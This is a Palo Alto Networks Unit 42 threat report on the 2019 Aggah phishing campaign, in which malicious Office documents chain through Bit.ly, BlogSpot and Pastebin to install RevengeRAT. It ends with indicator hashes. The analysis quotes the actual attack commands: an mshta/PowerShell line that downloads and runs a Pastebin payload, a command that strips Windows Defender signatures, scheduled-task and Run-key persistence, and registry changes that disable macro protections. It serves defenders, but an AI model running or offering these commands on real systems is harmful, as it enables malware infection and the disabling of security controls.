{ "id": "7165d99d-732d-406d-84d9-0ac6a7567b94", "created_at": "2026-04-06T00:08:38.047057Z", "updated_at": "2026-04-10T03:35:56.640211Z", "deleted_at": null, "sha1_hash": "d983112a3f954a98d504b21b89afdc1b40f17703", "title": "Aggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2473291, "plain_text": "Aggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large\r\nScale Campaign\r\nBy Robert Falcone, Brittany Barbehenn\r\nPublished: 2019-04-17 · Archived: 2026-04-02 11:40:15 UTC\r\nExecutive Summary\r\nIn March 2019, Unit 42 began looking into an attack campaign that appeared to be primarily focused on organizations\r\nwithin a Middle Eastern country. Further analysis revealed that this activity is likely part of a much larger campaign\r\nimpacting not only that region but also the United States, and throughout Europe and Asia.\r\nOur analysis of the delivery document revealed it was built to load a malicious macro-enabled document from a remote\r\nserver via Template Injection. These macros use BlogSpot posts to obtain a script that uses multiple Pastebin pastes to\r\ndownload additional scripts, which ultimately result in the final payload being RevengeRAT configured with a duckdns[.]org\r\ndomain for C2. During our research, we found several related delivery documents that followed the same process to\r\nultimately install RevengeRAT hosted on Pastebin, which suggests the actors used these TTPs throughout their attack\r\ncampaign.\r\nInitially, we believed this activity to be potentially associated with the Gorgon Group. Our hypothesis was based on the high\r\nlevel TTPs including the use of RevengeRAT. However, Unit 42 has not yet identified direct overlaps with other high-fidelity Gorgon Group indicators. Based on this, we are not able to assign this activity to the Gorgon group with an\r\nappropriate level of certainty.\r\nIn light of that, Unit 42 refers to the activity described in this blog as the Aggah Campaign based on the actor’s alias\r\n“hagga”, which was used to split data sent to the RevengeRAT C2 server and was the name of one of the Pastebin accounts\r\nused to host the RevengeRAT payloads.\r\nThe Delivery\r\nOur research into the Aggah campaign began with a delivery document sent to organizations in a single Middle Eastern\r\ncountry via an email on March 27, 2019. This email appeared to originate from a large financial institution in the same\r\ncountry, although it was likely spoofed. The subject of the email was “Your account is locked.” This initial delivery\r\ndocument was sent to organizations in one Middle Eastern country, specifically to organizations in the education,\r\nmedia/marketing, and government verticals. Four days later on March 31, we saw the same delivery email sent to a financial\r\norganization in a second Middle Eastern country. We later discovered that this delivery document was just one of many in a\r\nlarger campaign sent to organizations in the United States, Europe and Asia targeting the same verticals as in the Middle\r\nEast as well as Technology, Retail, Manufacturing, State/Local Government, Hospitality, Medical, Technology, and other\r\nProfessional business. The related documents were functionally similar, so we will describe the original sample we\r\nanalyzed.\r\nThe email sent on March 27 had a Word document attached with the filename “Activity.doc” (SHA256:\r\nd7c92a8aa03478155de6813c35e84727ac9d383e27ba751d833e5efba3d77946) that attempted to load a remote OLE\r\ndocument via Template Injection. When “Activity.doc” is opened, it displays the image in Figure 1 as a lure in an attempt to\r\ntrick the user into enabling content to allow macros to run. The lure suggests that the user must open the document in the\r\ndesktop versions of Microsoft Word, as macros do not function in the online version of Word in Office 365.The\r\n“Activity.doc” file does not contain a macro, but the OLE document that it loads from the remote server does contain a\r\nmacro.\r\nhttps://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/\r\nPage 1 of 18\n\nFigure 1. Lure image used in Activity.doc to trick user into enabling macros\r\nActivity.doc Analysis\r\nThe delivery document uses Template Injection to load a file hosted on a remote server. Figure 2 shows the contents of the\r\ndelivery document’s footer that attempts to load a remote OLE document\r\nfrom hxxps://static.wixstatic[.]com/ugd/05e470_b104c366c1f7423293887062c7354db2.doc:\r\nFigure 2. Footer in Activity.doc showing remote OLE location\r\nThe remote OLE file loaded in the footer of Activity.doc file is actually an RTF file (SHA256:\r\n5f762589cdb8955308db4bba140129f172bf2dbc1e979137b6cc7949f7b19e6f) that loads an embedded Excel document with\r\na heavily obfuscated macro that contains a significant amount of ‘junk’ code. The purpose of this macro is to decode and\r\nexecute the following URL via the \"Shell\" command:\r\nmshta hxxp://www.bitly[.]com/SmexEaldos3\r\nThe command above uses the built-in “mshta” application to download the contents of URL provided, in this case a\r\nshortened URL using the Bit.ly service. During WildFire's analysis, the shortened bit.ly URL redirected to\r\nhxxps://bjm9.blogspot[.]com/p/si.html, as seen in the “Location” field of the HTTP response in Figure 3.\r\nFigure 3. Bit.ly shortened link pointing to blog hosted at Blogspot\r\nAs you can see in the GET request above, the redirect points the browser (“mshta.exe” in this case) to a blog hosted on\r\nblogspot[.]com. As you can see in Figure 4, this BlogSpot article appears a bit odd but not necessarily malicious.\r\nhttps://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/\r\nPage 2 of 18\n\nFigure 4.  bjm9.blogspot[.]com screen capture\r\nBy analyzing the code hosted on the blog, we discovered it actually includes a JavaScript embedded within it that performs\r\nseveral activities. Figure 5 shows the malicious JavaScript hosted at the seemingly innocuous blog.\r\nFigure 5. Script embedded in bjm9 Blogspot article\r\nThe malicious script carries out several activities on the compromised system. First, it attempts to hamper Microsoft\r\nDefender by removing its signature set. The script also kills the Defender process along with the processes for several Office\r\napplications. All of this is performed using the following command line:\r\ncmd.exe /c cd \"\"%ProgramFiles%\\Windows Defender\"\" \u0026 MpCmdRun.exe -removedefinitions -dynamicsignatures \u0026\r\ntaskkill /f /im winword.exe \u0026 taskkill /f /im excel.exe \u0026 taskkill /f /im MSPUB.exe \u0026 taskkill /f /im POWERPNT.EXE \u0026\r\nforfiles /c \"\"taskkill /f /im MSASCuiL.exe\"\" \u0026 forfiles /c \"\"taskkill /f /im MpCmdRun.exe\"\" \u0026 exit\r\nThe script then attempts to disable security mechanisms within Office products, specifically by setting registry key values to\r\nenable macros and to disable ProtectedView. First, the script enables macros within Word, PowerPoint and Excel by setting\r\nthe following registry keys to a value of \"1\":\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\PowerPoint\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\PowerPoint\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\PowerPoint\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\PowerPoint\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\PowerPoint\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\Excel\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\Excel\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\Excel\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\Excel\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\VBAWarnings\r\nThe script then attempts to disable the ProtectedView security mechanism within Word, PowerPoint and Excel by setting the\r\nfollowing registry keys to a value of “1”:\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\PowerPoint\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\PowerPoint\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\PowerPoint\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\Excel\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nhttps://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/\r\nPage 3 of 18\n\nHKCU\\Software\\Microsoft\\Office\\11.0\\Excel\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\Excel\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\PowerPoint\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\PowerPoint\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\PowerPoint\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\Excel\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\Excel\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\Excel\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\PowerPoint\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\PowerPoint\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\PowerPoint\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\Excel\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\Excel\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\Excel\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\PowerPoint\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\PowerPoint\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\PowerPoint\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\Excel\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\Excel\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\Excel\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\PowerPoint\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\PowerPoint\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\PowerPoint\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nThe technique of enabling macros and disabling ProtectedView in Office, including the order in which the registry keys\r\nwere modified was also described in our blog covering the Gorgon group. Also, the tactic of killing processes for Windows\r\nhttps://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/\r\nPage 4 of 18\n\nDefender and Microsoft Office applications was also carried out by Gorgon as well. The Gorgon group also used the bitly\r\nURL shortening service in their attacks, but while these are obvious technique overlaps, we still do not have concrete\r\nevidence that this attack campaign is associated with Gorgon.\r\nThe script hosted on Blogspot then carries out three main activities that include:\r\n1. Downloading a payload from a Pastebin URL\r\n2. Creating a scheduled task to periodically obtain and run a script from a Pastebin URL\r\n3. Creating an autorun registry key to obtain and run a script from a Pastebin URL\r\nObtaining a payload from Pastebin\r\nThe script hosted at Blogspot obtains a portable executable payload from a Pastebin URL and executes it. The script builds\r\nthe following command and attempts to run it using the WScript.Shell object:\r\nmshta.exe vbscript:CreateObject(\"\"Wscript.Shell\"\").Run(\"\"powershell.exe -noexit -command\r\n[Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object\r\nNet.WebClient).DownloadString(\\'h\\'+\\'t\\'+\\'t\\'+\\'p\\'+\\'s:\\'+\\'//p\\'+\\'a\\'+\\'s\\'+\\'t\\'+\\'e\\'+\\'b\\'+\\'i\\'+\\'n\\'+\\'.\\'+\\'c\\'+\\'o\\'+\\'m\\'+\\'/\\'+\\'r\\'+\\'a\\'+\\'w\\'+\\'/\\'+\\'2LDaeHE1\\'\r\n(window.close)\r\nThe command above results in the downloading of a portable executable hosted on Pastebin at\r\nhttps://pastebin[.]com/raw/2LDaeHE1, decoding the base64 downloaded from the URL, and then executing it. Figure 6\r\nshows the Pastebin page hosting the executable downloaded by the script.\r\nFigure 6. 2LDaeHE1 Pastebin page\r\nThe decoded payload has the following attributes:\r\nSHA256 b9b67c885200f90eaf9c4911b3a7f5e6707bcb51d1b892df1bde110 13a60f6b5\r\nCompile Time 2019-03-20 19:43:08\r\nTable 2. Decoded payload from pastebin[.]com/raw/2LDaeHE1\r\nThis payload was written in VB.NET and named \"Nuclear Explosion,\" which is a variant of RevengeRAT configured to use\r\nthe domain \"lulla.duckdns[.]org\" for C2, as seen in Figure 7.\r\nhttps://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/\r\nPage 5 of 18\n\nFigure 7.  RevengeRAT configuration\r\nAccording to its configuration seen in Figure 8, when sending data to the C2 server, it will split the information using the\r\nstring \"hagga\", which is the same name as the PasteBin account hosting the payload information seen in Figure 6 and the\r\nbasis of the Aggah campaign name.\r\nFigure 8. Configuration showing the string \"hagga\" used to split information sent to the C2 server\r\nCreating a Scheduled Task\r\nThe script hosted at the Blogspot blog builds another command to create a scheduled task called \"eScan Backup\" that runs\r\nevery 100 minutes. The command string generated by the script used to create this scheduled task is:\r\nschtasks /create /sc MINUTE /mo 100 /tn eScan Backup /tr \"\"mshta\r\nvbscript:CreateObject(\"\"Wscript.Shell\"\").Run(\"\"mshta.exe https://pastebin[.]com/raw/tb5gHu2G\"\",0,true)(window.close)\"\"\r\n/F '\r\nThe “eScan Backup” task will use the built-in mshta application to download a script from a Pastebin URL, specifically at\r\nhxxps://pastebin[.]com/raw/tb5gHu2G that we will continue to refer to as the tb5gHu2G script. We believe the actors chose\r\nthe name “eScan Backup” to appear related to the eScan antivirus products. Figure 9 shows the scheduled task in Windows’\r\nTask Scheduler program.\r\nFigure 9. Scheduled task created to reach out to Pastebin URL and run the hosted script every 100 minutes\r\nThe scheduled task downloading and running the tb5gHu2G script is meant for persistence, as it runs the same command to\r\nhamper Windows Defender and kill Office applications. The tb5gHu2G script also attempts to run the same VBScript as the\r\nscript hosted on the Blogspot blog, of which downloads and executes the payload from the “2LDaeHE1” Pastebin page\r\nshown in Figure 6. Figure 10 shows the Pastebin page hosting the tb5gHu2G script.\r\nhttps://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/\r\nPage 6 of 18\n\nFigure 10. tb5gHu2G Pastebin page\r\nCreating an Autorun Registry Key\r\nThe script hosted at the Blogspot blog creates an autorun registry key, which appears to be a second persistence mechanism\r\nto supplement the previously mentioned scheduled task. To create the autorun key, the script generates the following\r\ncommand that it will attempt to run:\r\nCreateObject(\"Wscript.Shell\").regwrite \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\MicrosoftUpdate\",\r\n\"C:\\Windows\\System32\\mshta.exe\r\nvbscript:CreateObject(\"\"Wscript.Shell\"\").Run(\"\"mshta.exe%20http://pastebin[.]com/raw/YYZq1XR0\"\",0,true)\r\n(window.close)\" , \"REG_EXPAND_SZ\"\r\nThis run key will attempt to download the contents hosted at yet another Pastebin URL of\r\nhttp://pastebin[.]com/raw/YYZq1XR0\r\nand run the contents as a script using the Wscript.Shell object. Figure 11 shows the Pastebin page displaying the contents of\r\nthe script.\r\nFigure 11. YYZq1XR0 Pastebin page\r\nThe YYZq1XR0 Pastebin paste contains the following script that does very little:\r\n\u003cscript language=\"VBScript\"\u003e\r\nself.close\r\n\u003c/script\u003e\r\nThe fact that the above script does so little suggests that the actor may update this paste with a new script containing\r\nadditional functionality when desired. The editing of pastes is possible if the paste was created using a \"Pro\" account. These\r\npastes were created by an account named HAGGA, which appears to be a PRO account that would allow the actor to update\r\nhttps://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/\r\nPage 7 of 18\n\nthe script to run on infected systems. HAGGA has several additional pastes as well as seen below in Figure 12. These pastes\r\ncontain additional malicious scripts that are ultimately used to create a payload.\r\nFigure 12. Hagga’s Pastebin page\r\nPart of a Larger Campaign?\r\nWhile investigating this particular campaign we reviewed the click count available on Bit.ly.  As of April 11, 2019, the Bit.ly\r\nlink, SmexEaldos3, referenced in the analysis above contained over 1,900 clicks in about 20 countries spanning North\r\nAmerica, Europe, Asia, and the Middle East. This high volume click-count indicated to us that we were likely only looking\r\nat an extremely small subset of the actual campaign. It is also highly likely that these click counts also include individuals\r\naccessing the shortened link during investigations and research efforts; therefore, the number is not an accurate\r\nrepresentation of the number of hosts infected.\r\nFigure 13. bitly SmexEaldos3 page clicks\r\nDigging in a bit further we took a look at the document properties to see what additional information we may be able to use\r\nto help identify related activity. The document properties indicate these operators were using an apparently pirated version\r\nof Microsoft Word and used the string ‘Lulli moti myri’ as the creator/author of the document. Using this string we searched\r\nin our repositories and identified over a dozen Microsoft Office documents - half of them DOCX and the other half XLS.\r\nAll of the documents have a time stamp between January and April 2019, and each contained a Bit.ly URL that redirects to a\r\nBlogspot page.  While all of these documents were of interest to us, we noticed one configured with the same Bit.ly URL as\r\nour original file Activity.doc. This file has the following SHA256:\r\nSHA256 ef837119fc241e8fde85f36f4635a71f6b87aecf39dc979961be914 f48c4ef4c\r\nTable 3. Similarly configured document to Activity.doc\r\nhttps://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/\r\nPage 8 of 18\n\nDuring our analysis, we identified several Bit.ly URLs and their redirects resulting in the download of RevengeRAT. One\r\nparticular sample contains the C2 domain kronozzz2.duckdns[.]org. This sample has a SHA256 of:\r\nSHA256 c365b15cb567da7e9c04dffa0de1cb2b8104d5fe668c17691d8c683 80bcd6d30\r\nTable 4. Decoded payload from pastebin[.]com/raw/sgawvit9\r\nOne of HAGGA’s pastes includes the title ‘kronoz2 back2new’. This domain indicated to us another possible relation to the\r\nHAGGA Pastebin account shown in Figure 12. Open source research revealed a similar domain kronoz.duckdns[.]org\r\nassociated with a RevengeRAT sample with the following hash:\r\nSHA256 fa5500a45e98e084b489301fd109676a4d8b0d3b39df4d9e2288569 e232a9401\r\nTable 5. File associated with kronoz.duckdns[.]org\r\nAll identified samples are available in Appendix A.\r\nAfter reviewing all of the delivery documents and RevengeRAT payloads we discovered that all but one payload contains\r\nthe mutex RV_MUTEX-WindowsUpdateSysten32 (note the purposeful misspelling by the attackers of “Systen32” for\r\n“System32”) with a base64 encoded identifier of SE9URUlTIE5PVk9T that decodes to HOTEIS NOVOS (“NEW\r\nHOTELS” in Portuguese). We searched through our available repositories to see just how many samples contained these\r\nstrings. We found over 50 files beginning as early as September 2018, which are noted in Appendix A. Many of these\r\nsamples contained the same ‘hagga’ key; however, we also noted three other additional keys: ‘oldman’, ‘steve’, and\r\n‘roma225’. The ‘roma225’ key was discussed in December 2018 in a publication titled ‘The Enigmatic “Roma225”\r\nCampaign’ by Yoroi. The one sample that was not configured with that mutex and identifer was the sample noted in Table 5. \r\nThat sample contains the mutex RV_MUTEX-cuiGGjjtnxDpnF and the Identifier TWlsZWdvbmE= which decodes to\r\n‘Milegona’.\r\nCorrelating RevengeRAT samples\r\nRevengeRAT is a commodity Trojan that has many leaked builders freely available in open source, which makes attributing\r\nthe tool’s use to a specific actor or attack campaign difficult. Because of this, we wanted to determine if the mutex, identifier\r\nand key seen in Aggah related samples were not standard default values for RevengeRAT and if they were strong enough to\r\nuse for pivoting and correlation purposes. To gauge the likelihood of two unrelated actors using the same values in the\r\nconfiguration, we used the leaked RevengeRAT builder (v0.3) to visualize the process an actor would have to take to create\r\nRevengeRAT samples that shared the same mutex, identifier and key as the payload delivered in the Aggah campaign.\r\nTo our surprise, we found it was rather unlikely that two unrelated individuals would use the mutex, identifier, and key just\r\nby happenstance. We believe this as the actor must manually enter the mutex, identifier, and key into specific fields within\r\nthe RevengeRAT builder, in which we will highlight in the following explanation of steps required to build the Trojan.\r\nTo create the RevengeRAT payload used in this campaign, the actor would use the RevengeRAT server to compile an\r\nexecutable configured with the appropriate fields. First, the actor would set the “Socket Key” field to “hagga” and press\r\n“Start Listening”, as seen in Figure 14.\r\n \r\nFigure 14. RevengeRAT Builder Socket Key Setting\r\nOnce the server is configured and listening, the actor would click the “Client Builder” button to create the RevengeRAT\r\nclient, as seen in Figure 15.\r\nhttps://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/\r\nPage 9 of 18\n\nFigure 15. RevengeRAT Client Builder\r\nIn the Client Builder, the actor would click the “Network Settings” drop down and enter the domain “lulla.duckdns[.]org”\r\nand the TCP port of 2336 before pressing the add button seen in Figure 16.\r\n \r\nFigure 16. RevengeRAT Network Settings setup\r\nThe actor would then click the Basic Settings drop down and enter their chosen identifier “HOTEIS NOVOS” into the\r\n“Client Identifier” field and would add “-WindowsUpdateSysten32” in the “Client Mutex” field, as it already contains\r\n“RV_MUTEX” by default. Figure 17 shows these values added to the correct fields. What is of interest to note here is that\r\nthe actor manually added the string “-WindowsUpdateSysten32” instead of clicking the plus (“+”) button available next to\r\nthis field, which would concatenate a hyphen and a random string instead.\r\nhttps://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/\r\nPage 10 of 18\n\nFigure 17. RevengeRAT Basic Settings setup\r\nLastly, to compile the payload the actor has to agree to the Terms of Service and click the “Compile” button, as seen in\r\nFigure 18.\r\n \r\nFigure 18. RevengeRAT Ready to compile\r\nBy pressing the compile button, the RevengeRAT server will create a client executable with a default name of “Client.exe”\r\nthat the actor can save to the system prior to delivering it in their attack. Figure 19 shows the RevengeRAT client icon on the\r\ndesktop.\r\nFigure 19. RevengeRAT Client Icon\r\nhttps://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/\r\nPage 11 of 18\n\nThe configuration within the compiled “Client.exe” seen in Figures 16 and 17 visually matches the configuration of the\r\nRevengeRAT downloaded from Pastebin in the Aggah campaign, as seen in Figures 7 and 8. This suggests that the actor(s)\r\ninvolved in this campaign would have followed similar steps to create their payload. The sequence of steps carried out to\r\ncreate RevengeRAT payloads that share the same client identifiers and socket keys suggests with a high confidence that a\r\ncommon actor is involved.\r\nConclusion\r\nInitially, according to our telemetry it appeared as though this could be a very focused effort to target organizations within\r\none Middle Eastern country. However, after further analysis this appears to be just a small part of a much larger campaign\r\nwhich also seems to be affecting many regions including but not limited to the United States, Europe, and Asia.\r\nUnfortunately, our current data set does not afford insight into the attackers’ motivation other than to compromise a large\r\nnumber of victims.\r\nWhile a lot of this activity behaviorally appears to be potentially related to the Gorgon Group’s criminal activity, it is\r\ncurrently unclear and requires additional analysis to prove. Both Unit 42 and Yoroi recently released similar blogs which\r\nalso displayed similar tactics but were not assessed with a high level of confidence as related to the Gorgon Group. Although\r\nwe are unsure of a connection to the Gorgon Group specifically, we do assess that based on the unique configuration of these\r\nRevengeRAT samples that a common operator was likely involved in the activity mentioned in this blog.\r\nRevengeRAT is a publicly available RAT which is seen in high volume.  It appears as though some users of this RAT have\r\nmoved from following publicly available step-by-step guides to become a little more sophisticated in how they are\r\nleveraging alternative storage locations for C2 support, such as Pastebin. These technique changes may help the operators by\r\nhiding behind legitimate services that are likely not blocked by security devices.\r\nPalo Alto Networks customers are protected from these operators in the following ways:\r\nAutoFocus: Customers can currently track this campaign activity using the following tags: Aggah, RevengeRAT\r\nWildFire and Traps: detects all malware supported in this report as malicious\r\nPalo Alto Networks has shared our findings, including file samples and indicators of compromise, in this report with our\r\nfellow Cyber Threat Alliance members. CTA members use this intelligence to rapidly deploy protections to their customers\r\nand to systematically disrupt malicious cyber actors. For more information on the Cyber Threat Alliance, visit\r\nwww.cyberthreatalliance.org.\r\nAppendix A:\r\nIndicators of Compromise\r\nMalicious Documents and Payloads\r\n6101f3210638a6068a9d40077f958e8d8a99ffed686a48426784f368e0ac021b\r\n89d302cfe11c5fdca420d12cc36d58b449f24ee761b822cb8a22497af7e873ba\r\n248456219c1be39f494301a16cae0a4ed9676be8d1155fa8ba5540d223797e97\r\n82e64d2233cd8e755fecfefbd976f6143138f9b33e037f24a25b05fe9abd5620\r\n1eef9ef568703ba6558923ec88cf960ed86086d87488a188709d32827877f528\r\n9b47e150a9259ae7a6df20f070dc9faf9d5a589347f8db8a9f64c64060cb7606\r\n679f1d59116af145f4f7c1a4d1cdb66e4402b0da906a491e09071e8eac696a16\r\nfa5500a45e98e084b489301fd109676a4d8b0d3b39df4d9e2288569e232a9401\r\n98136bc4323e00f64b63d1035c313bc08fb56af7894ac050b8e9db6961593eef\r\nc365b15cb567da7e9c04dffa0de1cb2b8104d5fe668c17691d8c68380bcd6d30\r\nb9b67c885200f90eaf9c4911b3a7f5e6707bcb51d1b892df1bde11013a60f6b5\r\nec8ff76234aca351169e7cf4973b8b5d603fa165815107482cbd0d803a829e81\r\naaabc63bd58fa4b8e2cb79630ea5e24c55f29327cae8ca36aae3219b95100669\r\nc87fb09929159c2dab63d609d7bde992ce979f3545fbe20ddca0a3f263d9603f\r\nabba33bdc8cf21423202b000771ec10d8ab7248f199d8211e53be03c9905b0ed\r\na4c1a9d4a6be9290a58b282f6b7dc75ebd4d4e3866df4fdab80eac56274aabf1\r\nhttps://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/\r\nPage 12 of 18\n\n947ddcefbb1170a6fbd1ba341c773444c1833bedecdb4d6684e05b8555765117\r\n6fe3548e0dc7fb605ee69791b752df0d9f3d8f5db49b2811011ac2a092ab0a28\r\n6def95b2858c043e261b8f4d440abc1436a9dc551906d86a37c5f3331af8cbfc\r\neacad199f02e26ccdc7a866c18e585f7ee7e2a80ef0325208ddb22b1d059be2f\r\nd2a16840541f905f7bcecf64e2d7dc827f314c4b97daf6e4cc4262fd91fdd14c\r\n61600526307ec08137967b49b230c03ce8a4e1d2f0d58ea2e5d8b2ab3bf92df7\r\n8e6c25f517a69c5da329f858b291b4d146c3fd0dd07c17a1d8a6851cddb347eb\r\n7acd5696306ae7ed8de112f096917487df2d01c2aa66b4b9d2a37ea36b597b1a\r\n2815552fd2f57eba147715331f96387dcb4769d3af816e9db2195e5602fc3a1a\r\n251e3e25584d1a654a395accbcfdb506ec8b9d7039cb3ab725e14415d3c71aad\r\nf5e170571689b393139b9cea484a9683305129ecbf2ab4ebb93fc997ee1d31aa\r\n77a1430cfd728daa7a61e10f3cdc3409104cae1aed65711c8f5ce425c6920cb7\r\n9c8fa4205b2ed8a6f60156bdc39d33a23c6e503cf2f8e69d66bf2980e78bacef\r\nc57ff49bfe21e345c2bde30bc8feb60626f3c7839b1c2e5a1f01b9a567f911d8\r\n8e771cbb12b259d4d12feac34c80e95eb38228dea393d49e0b9cc6f19861847c\r\nabcce639df67279c73f327b2c511183c00ca96555fe481a4ae417bf752c96efa\r\n83d9c57cfc40457b072bdc0e062dd5ca4958a91d8cf3387dbedd99af753da640\r\n5976fca040071eb33ca383412b915e5160133c4e0f8a07bbbaa478ceeee0